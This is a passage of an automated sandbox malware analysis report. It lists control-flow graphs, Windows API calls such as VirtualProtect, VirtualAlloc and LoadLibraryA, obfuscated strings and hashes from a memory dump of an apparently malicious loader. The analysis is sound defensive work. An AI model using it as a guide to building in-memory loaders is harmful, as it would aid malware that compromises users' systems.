                                                                                                                                                                                                                          • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                                                                                          • Instruction ID: 36017e2c47d3839eb711a1cdb2fde0e39aad7a572a2d8243b87e9001cceb6fdc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A41E574A00209EFDB04CF98C994BAEB7B1FF48304F2081A8D515AB399C771AE85CF94

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 203 23410c4-23410de call 23432e2 206 23410e6-23410ff call 2343380 203->206 207 23410e0-23410e1 203->207 211 2341105-2341110 206->211 212 23411b7 206->212 208 23411bb-23411be 207->208 211->212 213 2341116-2341124 VirtualProtect 211->213 214 23411b9-23411ba 212->214 213->212 215 234112a-234116c call 23432d8 call 2343950 VirtualProtect call 2343380 213->215 214->208 215->212 222 234116e-234117a 215->222 222->212 223 234117c-234118a VirtualProtect 222->223 223->212 224 234118c-23411b5 call 23432d8 call 2343950 VirtualProtect 223->224 224->214
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 023432E2: LoadLibraryA.KERNEL32(00000000,?,?), ref: 02343374
                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(00000000,0000000C,00000040,?), ref: 0234111F
                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(00000000,0000000C,?,?), ref: 02341152
                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(00000000,0040145E,00000040,?), ref: 02341185
                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(00000000,0040145E,?,?), ref: 023411AF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 895956442-0
                                                                                                                                                                                                                          • Opcode ID: 2e97600cb857c96b3e27a7ca78dc6b50189988e4741ea1636e9ebab3cfc04358
                                                                                                                                                                                                                          • Instruction ID: 22d7af0f707137cef9ab685f0bf46cf8ee987b3d3961c3ab3db48c26ff0abfc5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e97600cb857c96b3e27a7ca78dc6b50189988e4741ea1636e9ebab3cfc04358
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 152194722046493EE320AAA18C44FB777DCDB85304F0404BEFE4AD2591EF65B54586A5

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 229 2341f34-2341f98 call 23434db * 3 236 2341fc2 229->236 237 2341f9a-2341f9c 229->237 239 2341fc5-2341fcf 236->239 237->236 238 2341f9e-2341fa0 237->238 238->236 240 2341fa2-2341fb4 VirtualAlloc 238->240 241 2341fb6-2341fbd 240->241 242 2341fd0-2341ff3 call 2343950 call 2343974 240->242 241->236 243 2341fbf 241->243 248 2341ff5-234202b call 2343648 call 234351e 242->248 249 234203d-2342056 call 23434db 242->249 243->236 258 2342031-2342037 248->258 259 234228c-2342295 248->259 249->236 255 234205c 249->255 257 2342062-2342068 255->257 260 23420a4-23420ad 257->260 261 234206a-2342070 257->261 258->249 258->259 264 2342297-234229a 259->264 265 234229c-23422a4 259->265 262 2342106-2342111 260->262 263 23420af-23420b5 260->263 266 2342072-2342075 261->266 272 2342113-234211c call 2341228 262->272 273 234212a-234212d 262->273 269 23420b9-23420d4 call 23434db 263->269 264->265 270 23422d3 264->270 265->270 271 23422a6-23422d1 call 2343974 265->271 267 2342077-234207c 266->267 268 2342089-234208b 266->268 267->268 276 234207e-2342087 267->276 268->260 277 234208d-234209b call 23432e2 268->277 294 23420d6-23420de 269->294 295 23420f3-2342104 269->295 274 23422d7-23422f7 call 2343974 VirtualFree 270->274 271->274 279 2342288 272->279 290 2342122-2342128 272->290 278 2342133-234213c 273->278 273->279 298 23422fd-23422ff 274->298 299 23422f9-23422fb RtlExitUserProcess 274->299 276->266 276->268 291 23420a0-23420a2 277->291 285 2342142-2342149 278->285 286 234213e 278->286 279->259 292 2342179-234217d 285->292 293 234214b-2342154 call 23410c4 285->293 286->285 290->285 291->257 296 2342183-23421a5 292->296 297 234221f-2342222 292->297 309 2342156-234215c 293->309 310 2342162-2342163 call 23411bf 293->310 294->279 301 23420e4-23420ed 294->301 295->262 295->269 296->279 314 23421ab-23421be call 2343950 296->314 303 2342274-2342276 call 2342664 297->303 304 2342224-2342227 297->304 298->239 299->298 301->279 301->295 313 234227b-234227c 303->313 304->303 306 2342229-234222c 304->306 311 2342245-2342256 call 2341d25 306->311 312 234222e-2342230 306->312 309->279 309->310 320 2342168-234216b 310->320 330 2342267-2342272 call 23417f1 311->330 331 2342258-2342264 call 2342304 311->331 312->311 316 2342232-2342235 312->316 317 234227d-2342284 313->317 328 23421c0-23421c4 314->328 329 23421e2-234221b 314->329 321 2342237-234223a 316->321 322 234223c-2342243 call 2342ed2 316->322 317->279 323 2342286 317->323 320->292 326 234216d-2342173 320->326 321->317 321->322 322->313 323->323 326->279 326->292 328->329 333 23421c6-23421c9 328->333 329->279 341 234221d 329->341 330->313 331->330 333->297 337 23421cb-23421e0 call 2343753 333->337 337->341 341->297
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02341FAE
                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 023422F2
                                                                                                                                                                                                                          • RtlExitUserProcess.NTDLL(00000000), ref: 023422FB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Virtual$AllocExitFreeProcessUser
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1828502597-0
                                                                                                                                                                                                                          • Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                                                                                                          • Instruction ID: 3fe85efe111094b8ba8061d0edb2f70e96cf22fd1a42799f20c848e16e86a12c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DCB1D131600B06ABDB759A60CC80BBBB7E9FF45314F140699FE99A2150EF31F551CB91

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 430 23432e2-23432f5 431 23432f7-23432fa 430->431 432 234330d-2343317 430->432 433 23432fc-23432ff 431->433 434 2343326-2343332 432->434 435 2343319-2343321 432->435 433->432 436 2343301-234330b 433->436 437 2343335-234333a 434->437 435->434 436->432 436->433 438 234333c-2343347 437->438 439 234336d-2343374 LoadLibraryA 437->439 441 2343363-2343367 438->441 442 2343349-2343361 call 23439b0 438->442 440 2343377-234337b 439->440 441->437 443 2343369-234336b 441->443 442->441 446 234337c-234337e 442->446 443->439 443->440 446->440
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(00000000,?,?), ref: 02343374
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                          • String ID: .dll
                                                                                                                                                                                                                          • API String ID: 1029625771-2738580789
                                                                                                                                                                                                                          • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                                                                                          • Instruction ID: bb5fe7d9727ad801070afec8a9a15e305a9c1a7e5dd8473318e40f73744ea46a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A21B4356042959FE721CF6CC844B6E7BE4AF45628F2841EDD841CBA51DF70F845CB80

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 447 23411bf-23411ec call 23432e2 call 2343380 452 2341222 447->452 453 23411ee-23411fc VirtualProtect 447->453 455 2341224-2341227 452->455 453->452 454 23411fe-2341220 call 2343950 VirtualProtect 453->454 454->455
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 023432E2: LoadLibraryA.KERNEL32(00000000,?,?), ref: 02343374
                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(00000000,00000004,00000040,?), ref: 023411F7
                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(00000000,00000004,?,?), ref: 0234121A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 895956442-0
                                                                                                                                                                                                                          • Opcode ID: 31a2c6fb5a155253d75781cd9ceba9c7cc267d2f06376007566f6440306b8afe
                                                                                                                                                                                                                          • Instruction ID: a49ad5ada9984dfbd336445447e41c46e58dc5c395b3340b789bf5a3192dc652
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31a2c6fb5a155253d75781cd9ceba9c7cc267d2f06376007566f6440306b8afe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DF081B61106087AE620AA64DC41FFF73ECDF49614F400458FF4AD6080EB61FA418AA5

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 458 23278ff-2327b69 459 2327b6b-2327b6e 458->459 460 2327c04-2327c3d 459->460 461 2327b74-2327bff 459->461 462 2327c3f-2327c4d 460->462 461->459 463 2327c5f-2327cbf 462->463 464 2327c4f-2327c5d 462->464 465 2327cc5-2327cc8 463->465 464->462 466 2327d00-2327d2a 465->466 467 2327cca-2327cfe 465->467 468 2327d2c-2327d3a 466->468 467->465 469 2327d4c-2327d97 468->469 470 2327d3c-2327d4a 468->470 471 2327d99-2327d9c 469->471 470->468 472 2327de5-2327e02 471->472 473 2327d9e-2327de3 471->473 474 2327e04-2327e07 472->474 473->471 475 2327e60-2327e65 474->475 476 2327e09-2327e5e 474->476 477 2327e68-2327e6e 475->477 476->474 478 2327e70 477->478 479 2327e75-2327e87 477->479 480 2327f06-2327f39 478->480 481 2327e8b-2327e91 479->481 482 2327e89 479->482 483 2327ef7-2327efa 481->483 484 2327e93-2327ef4 call 232e74c 481->484 482->483 486 2327efe-2327f01 483->486 487 2327efc 483->487 484->483 486->477 487->480
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: )$:$E$K$N$O$X$Y$`$c$d$e$e$f$j$m$r$s$s$t$t$t$t$y$z${${${$|$|$}$}
                                                                                                                                                                                                                          • API String ID: 0-2770104185
                                                                                                                                                                                                                          • Opcode ID: 7f6e799ca60fba2b1e70b9238865b2de8e17b7e5c269d78dd588de653e8ae45d
                                                                                                                                                                                                                          • Instruction ID: 053d899feba2c0612d0951ffa4e1dffc173009e2f004bed7b27a6d894601b7d7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f6e799ca60fba2b1e70b9238865b2de8e17b7e5c269d78dd588de653e8ae45d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2E1A935A2462986DB25CF24CC413DDB3B2FF85310F5491EDC4696B3A5EB388A85CB4B

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 491 22fe6a1-22fe6c6 call 22fa05c 494 22fe6cc-22fe730 491->494 494->494 495 22fe732-22fe79b 494->495 496 22fe79c-22fe7c8 495->496 496->496 497 22fe7ca-22fe7db 496->497 498 22fe7dd-22fe7e4 497->498 499 22fe7f7-22fe803 497->499 500 22fe7ec-22fe7f5 498->500 501 22fe817-22fe824 499->501 502 22fe805-22fe806 499->502 500->499 500->500 503 22fe847-22fe84f 501->503 504 22fe826-22fe82d 501->504 505 22fe80c-22fe815 502->505 507 22fe867-22fe97f 503->507 508 22fe851-22fe852 503->508 506 22fe83c-22fe845 504->506 505->501 505->505 506->503 506->506 510 22fe98c-22fe9ac 507->510 509 22fe85c-22fe865 508->509 509->507 509->509 510->510 511 22fe9ae-22fe9db 510->511 512 22fe9dc-22fea02 511->512 512->512 513 22fea04-22fea63 call 22fd06c 512->513
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 0h+h$<h7h$ChYh$Ehph$FhFh$HhPh$Kh^h$RhTh$Rhvh$Xh h$^hYh$`h,h$ehdh$fhch$hh(h$ohuh$ph8h$shoh$uheh$uhjh$vh}h$xhdh$yhrh
                                                                                                                                                                                                                          • API String ID: 0-2769190428
                                                                                                                                                                                                                          • Opcode ID: 62bd0668214c51b4c5d17cf1187cf7cd8d844dc3ff97adb52a48ee0f94597fea
                                                                                                                                                                                                                          • Instruction ID: 73c9a107291dec41203f412c4c51255eceede39150cc5dfbeebe846c4386b346
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62bd0668214c51b4c5d17cf1187cf7cd8d844dc3ff97adb52a48ee0f94597fea
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E8111B191D3D18AD7318F68D98939BBBE1EFC2300F55496CC2C85B220E7760516CB57

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 516 230fdbc-230fe54 call 233048c 520 230fe64-230feaa call 233048c * 3 516->520 521 230fe56-230fe59 516->521 538 230feaf-230feb1 520->538 522 230ff0b-230ff17 521->522 523 230fe5f 521->523 527 230ff1c-230ff27 522->527 525 2310396-2310398 523->525 530 2310611-231061b 525->530 527->527 528 230ff29-230ff2b 527->528 531 230ff2c-230ff33 528->531 531->531 533 230ff35-230ff3b 531->533 535 230ff3c-230ff43 533->535 535->535 537 230ff45-230ff7b call 22f99bc 535->537 545 230ff7c-2310002 537->545 539 230fee2-230ff05 call 233048c 538->539 540 230feb3-230fec3 538->540 539->522 539->525 547 230fec5-230fed2 540->547 548 230feac 540->548 545->545 549 2310008-231001b 545->549 547->539 554 230fed4-230fee0 547->554 548->538 550 231001c-231003e 549->550 550->550 553 2310040-231004c 550->553 555 2310067-2310076 553->555 556 231004e-2310054 553->556 554->548 558 2310087-2310091 555->558 559 2310078-231007b 555->559 557 231005c-2310065 556->557 557->555 557->557 560 2310093-2310097 558->560 561 23100a7-23100af 558->561 563 231007c-2310085 559->563 564 231009c-23100a5 560->564 565 23100b1-23100b2 561->565 566 23100c7-23101d7 561->566 563->558 563->563 564->561 564->564 567 23100bc-23100c5 565->567 568 23101dc-231025d 566->568 567->566 567->567 568->568 569 2310263-2310274 568->569 570 2310276-231027e 569->570 571 2310299-231029d 569->571 572 231028c-2310295 570->572 573 23102a0-23102aa 571->573 572->572 574 2310297 572->574 575 23102c7-23102ee call 233048c 573->575 576 23102ac-23102b0 573->576 574->573 581 23102f0-23102f3 575->581 582 231033b-2310347 call 22f99cc 575->582 578 23102bc-23102c5 576->578 578->575 578->578 581->582 584 23102f5-2310336 call 233048c * 2 call 22f99cc 581->584 582->525 587 2310349-2310377 call 22f99bc call 231080c 582->587 584->530 596 23105f0 587->596 597 231037d-231038d 587->597 600 23105f7-23105fd 596->600 598 231039d-23103a9 597->598 599 231038f-2310391 597->599 605 23103ab 598->605 606 23103ad-23103bb call 22f99bc 598->606 602 23104d0-2310502 599->602 603 23105ff-2310603 600->603 604 231060e 600->604 609 231050c-2310545 602->609 603->604 610 2310605-231060b call 22f99cc 603->610 604->530 605->606 615 23103c1-23103cb 606->615 616 23104bc-23104cc 606->616 609->609 613 2310547-2310550 609->613 610->604 617 2310552-231055a 613->617 618 231057e-2310580 613->618 620 23103d1-23103d3 615->620 621 231046d-2310498 615->621 616->602 622 2310563-2310567 617->622 623 2310630-2310634 618->623 624 2310586-231058d 618->624 620->621 625 23103d9-23103db 620->625 629 23104a8-23104b8 call 22f99cc 621->629 630 231049a-23104a5 621->630 622->624 628 2310569-2310570 622->628 626 2310651-2310661 call 231080c 623->626 627 2310636-231064d 623->627 624->596 631 231058f-23105b8 call 230f32c 624->631 625->629 632 23103e1-23103f5 625->632 626->596 647 2310663-2310676 626->647 627->626 634 2310572-2310574 628->634 635 2310576 628->635 629->616 630->629 631->596 645 23105ba-23105ea call 233048c * 2 631->645 640 23103f7-23103f9 632->640 641 231040f-2310414 632->641 634->635 643 2310578-231057c 635->643 644 231055c-2310561 635->644 646 23103fb-2310405 640->646 641->629 648 231041a-231041c 641->648 643->644 644->618 644->622 645->596 646->646 650 2310407-231040b 646->650 651 2310678-231067a 647->651 652 231068c-2310698 647->652 653 231041e-2310469 648->653 650->641 655 23107cf-23107eb 651->655 656 231069a 652->656 657 231069c-23106ab call 22f99bc 652->657 653->653 658 231046b 653->658 659 23107ec-23107f6 655->659 656->657 667 23106b1-23106bb 657->667 668 23107ba-23107cb 657->668 658->629 661 231062c-231062e 659->661 662 23107fc-23107ff 659->662 661->600 661->623 662->659 665 2310801 662->665 665->661 669 23106c1-23106c3 667->669 670 231076b-2310796 667->670 668->655 669->670 672 23106c9-23106cb 669->672 673 23107a6-23107b6 call 22f99cc 670->673 674 2310798-23107a3 670->674 672->673 675 23106d1-23106e5 672->675 673->668 674->673 678 2310700-2310705 675->678 679 23106e7-23106eb 675->679 678->673 682 231070b-231070f 678->682 681 23106ec-23106f6 679->681 681->681 683 23106f8-23106fc 681->683 684 231071c-2310767 682->684 683->678 684->684 685 2310769 684->685 685->673
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: ^*a$#J+Y$%b*]$'O'O$2O#O$3?Uq$5a|u$7:n\$<[&^$>$?g3q$A:v]$Y?q?$sy:K
                                                                                                                                                                                                                          • API String ID: 0-3553224314
                                                                                                                                                                                                                          • Opcode ID: 0e7f15785e9422a88d43a37637ed228b1f63b83bd63c417a99a314ab803aab10
                                                                                                                                                                                                                          • Instruction ID: 9bef259040bbad7ade4cdd1e71e33a3ecc6ca17a2021a2612e1afc7a6d9ef068
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e7f15785e9422a88d43a37637ed228b1f63b83bd63c417a99a314ab803aab10
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A52477190C3518FC729DF24C89076FBBE1AF85314F088A6DE8D99B392E7358945CB92

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 686 231244c-2312467 687 231246c-2312475 686->687 687->687 688 2312477 687->688 689 231247c-2312485 688->689 689->689 690 2312487-23124b6 689->690 691 23124b8-23124bd 690->691 692 23124bf-23124c1 690->692 693 23124c8-231255b call 22f99bc 691->693 692->693 696 231255c-2312583 693->696 696->696 697 2312585-2312612 696->697 698 231261c-231264b 697->698 698->698 699 231264d-2312658 698->699 700 231265a-231265f 699->700 701 231267d-231268a 699->701 702 231266c-231267b 700->702 703 231268c-2312692 701->703 704 23126af 701->704 702->701 702->702 705 231269c-23126ab 703->705 706 23126b1-23126c3 704->706 705->705 707 23126ad 705->707 708 23126c5-23126cb 706->708 709 23126dd-23126ea 706->709 707->706 710 23126cc-23126db 708->710 711 231270d-2312720 709->711 712 23126ec-23126f0 709->712 710->709 710->710 714 231272c-2312735 711->714 713 23126fc-231270b 712->713 713->711 713->713 714->714 715 2312737-231273e 714->715 716 231274c-2312755 715->716 716->716 717 2312757-231275f 716->717 718 231276c-2312775 717->718 718->718 719 2312777-23127b2 718->719 720 23127b4-23127b9 719->720 721 23127bb 719->721 722 23127bd-23127f1 call 22f99bc 720->722 721->722 725 23127fc-2312827 722->725 725->725 726 2312829-2312833 725->726 727 2312835-231283b 726->727 728 231284d-2312858 726->728 729 231283c-231284b 727->729 730 231285a-231285d 728->730 731 231287d-231288d 728->731 729->728 729->729 732 231286c-231287b 730->732 733 23128ad-23128be 731->733 734 231288f-2312892 731->734 732->731 732->732 736 23128c0-23128c6 733->736 737 23128df 733->737 735 231289c-23128ab 734->735 735->733 735->735 738 23128cc-23128db 736->738 739 23128e2-231290b call 2312bbc 737->739 738->738 741 23128dd 738->741 741->739
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: #3#3$#3=3$'3!3$*$83F3$83R3$93=3$:3 3$J3L3$O30$d3f3$i3_3$k3l3
                                                                                                                                                                                                                          • API String ID: 0-1612148737
                                                                                                                                                                                                                          • Opcode ID: 9399a7ee9c6e5426ff3ceaea5b5b42d51cd07c97ddf9252c8df36100a12064cf
                                                                                                                                                                                                                          • Instruction ID: 85a0367be6e594bc30574b7c12716eb455307c67b197519321bfdf18fa40ea7a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9399a7ee9c6e5426ff3ceaea5b5b42d51cd07c97ddf9252c8df36100a12064cf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FB1E0B15183608BC728DF28C85676BB7F1FFD1314F189A1CE8968B3A4E7748944CB96

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 745 2327f95-23280b2 746 23280b4-23280b7 745->746 747 2328106-2328143 746->747 748 23280b9-2328104 746->748 749 2328145-2328153 747->749 748->746 750 2328165-23281d1 749->750 751 2328155-2328163 749->751 752 23281d3-23281d6 750->752 751->749 753 2328226-232825a 752->753 754 23281d8-2328224 752->754 755 232825c-232826a 753->755 754->752 756 232827c-23282ce 755->756 757 232826c-232827a 755->757 758 23282d0-23282d3 756->758 757->755 759 23282d5-2328317 758->759 760 2328319-2328337 758->760 759->758 761 2328339-232833c 760->761 762 2328395-2328398 761->762 763 232833e-2328393 761->763 764 232839a-23283a0 762->764 763->761 765 23283a2 764->765 766 23283a7-23283b9 764->766 767 2328432-2328455 765->767 768 23283bb 766->768 769 23283bd-23283c3 766->769 770 2328423-2328426 768->770 769->770 771 23283c5-2328420 call 232e74c 769->771 772 232842a-232842d 770->772 773 2328428 770->773 771->770 772->764 773->767
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 0$3)$<$>$?|$A|$H|$L|$Y|$|
                                                                                                                                                                                                                          • API String ID: 0-3316653610
                                                                                                                                                                                                                          • Opcode ID: 0dc91d836e0d5c3997780718ccc6f68a7ea55a4edb7e82d95e45a445da5d2cfb
                                                                                                                                                                                                                          • Instruction ID: 818abb8ec1a5fd6f4a2afdb36773adacdb98e19d4ab45b3ae9e9613b1d5ea261
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0dc91d836e0d5c3997780718ccc6f68a7ea55a4edb7e82d95e45a445da5d2cfb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6DC1E232E1427886DB24CF69CC103DDB3B2EF40314F1595E9C909AB3A5E7344E86CB9A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: "f&f$)fvf$,f4f$=f!f$=f(f$Pf6f${fGf
                                                                                                                                                                                                                          • API String ID: 0-1107927452
                                                                                                                                                                                                                          • Opcode ID: 1608b7182de8cbe444d3093ca434a734da6d5c0a9eca3f72a53d91f17003a5b6
                                                                                                                                                                                                                          • Instruction ID: f10e3309d45e700b0d4e5787cc44329a819ca56a39f0382b28dc6af66e714906
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1608b7182de8cbe444d3093ca434a734da6d5c0a9eca3f72a53d91f17003a5b6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8471E5728143218BC7248F19C4A17ABF7F1FF85B50F0A891DE8C96B3A1E7749950CB95
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: (!T!$2!0!$8!(!$8!?!$ndsd$pdvd${dd
                                                                                                                                                                                                                          • API String ID: 0-1518220675
                                                                                                                                                                                                                          • Opcode ID: 2f878382fdc0504f8a728bb41ff19acb4626bafb4b905e0c7bf6778849e2319d
                                                                                                                                                                                                                          • Instruction ID: b2f4f04c67a5f3cd53724e883504f4c00dd9f37dd2c27f8ea76cd3e3eab847e3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f878382fdc0504f8a728bb41ff19acb4626bafb4b905e0c7bf6778849e2319d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D71CBB2A5C3149BC715CF16C88166FBBE2FFD5304F49AC2CE5C88B250D235DA098B96
                                                                                                                                                                                                                          Strings
